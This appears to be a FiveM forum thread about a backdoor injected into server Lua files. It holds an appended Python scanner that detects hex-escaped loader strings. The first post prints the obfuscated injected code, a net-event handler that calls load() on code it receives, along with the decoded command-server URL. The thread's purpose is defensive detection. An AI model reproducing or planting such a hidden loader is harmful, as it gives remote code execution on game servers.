Screenshot-basic BACKDOOR

When I run screenshot-basic it injects some code into a random file, and when decoded it's a cfxre.com URL.

./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/[smartphone]/qs-smartphone/config/config_uber.lua:local OMBrqKfTPblmDAxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrAebAdQjqpUwbeLnYshnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEVvXVJuEYUDBQDPfsFjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANbAdQjqpUwbeLnYshnS[4]() end)
Binary file ./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/qs-core/server/functions.lua matches
./server/alpine/opt/cfx-server/citizen/system_resources/monitor/resource/menu/vendor/freecam/config.lua:local OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x66\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEJiefDzHgFzgMVvXVJjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjS[4]() end)

The URL decoded: https://cfxre.com/v2_/stage3b.php?asf=MlIrVFIvVWx6R3J0N1Vod2pGTi9jSzgxbnlYZlYrdm5PTlBJK1Nrd0NJODBiZ3hTTnpsSUhPcDJMWUVKRTdqdA==

It appears you probably got your server infected with a stolen/leaked resource that has a backdoor in it. That is not normal behavior, and I have qs-smartphone as well, and it doesn’t do those things.

Also, cfxre.com is not a FiveM domain to my knowledge, as it would be either cfx.re or fivem.net.

The screenshot-basic is probably not from the good link, and you got one with this backdoor.

So typical. Honestly, your best bet is to start over and stop using leaked scripts from some dodgy website.
It's not worth the risk, hassle or time trying to disinfect the scripts, and let this be a lesson learned on why not to use leaked scripts.
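
Added example (not from any poster in this thread or from the Cfx.re project): a Python scanner that decodes all-escaped Lua string literals like the ones in the grep output above and flags a file when the hidden names include `load` together with an event API. The flagging rule, the helper names and the sample strings are assumptions constructed from the names visible in the first post.

```python
import re
from pathlib import Path

# A Lua string literal made up only of \xHH or \ddd escapes. Curly quotes are
# accepted too, because forum software often rewrites straight quotes.
ESCAPED_LITERAL = re.compile(r'["“”]((?:\\x[0-9a-fA-F]{2}|\\\d{1,3}){3,})["“”]')
ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\(\d{1,3})')
# Assumed heuristic: a hidden code-execution name plus a hidden event API name.
CODE_EXEC = {"load"}
EVENT_API = {"RegisterNetEvent", "AddEventHandler"}

def decode_literal(body):
    """Turn an all-escaped Lua literal body back into readable text."""
    return ESCAPE.sub(lambda m: chr(int(m[1], 16) if m[1] else int(m[2])), body)

def scan_text(text):
    """Return (decoded hidden strings, suspicious?) for one Lua source text."""
    decoded = [decode_literal(b) for b in ESCAPED_LITERAL.findall(text)]
    names = set(decoded)
    return decoded, bool(names & CODE_EXEC) and bool(names & EVENT_API)

def scan_tree(root):
    """Walk a resources directory and list Lua files with hidden loader names."""
    hits = []
    for path in Path(root).rglob("*.lua"):
        text = path.read_text(encoding="utf-8", errors="replace")
        decoded, suspicious = scan_text(text)
        if suspicious:
            hits.append((str(path), decoded))
    return hits

def hex_escape(s):
    """Encode a name the way the injected line does (used for the sample only)."""
    return "".join(f"\\x{ord(c):02x}" for c in s)

# Constructed sample inputs, not copied from any real file.
SAMPLE = "local t = {" + ",".join(f'"{hex_escape(s)}"' for s in
    ["RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"]) + ",_G}"
CLEAN = 'local Config = { title = "Uber", reset = "\\27[0m" }'

if __name__ == "__main__":
    print(scan_text(SAMPLE))
    print(scan_text(CLEAN))
```

Run `scan_tree` against the server's resources directory from a clean machine or an offline copy; a hit means the file needs manual review, not that the list of hits is complete.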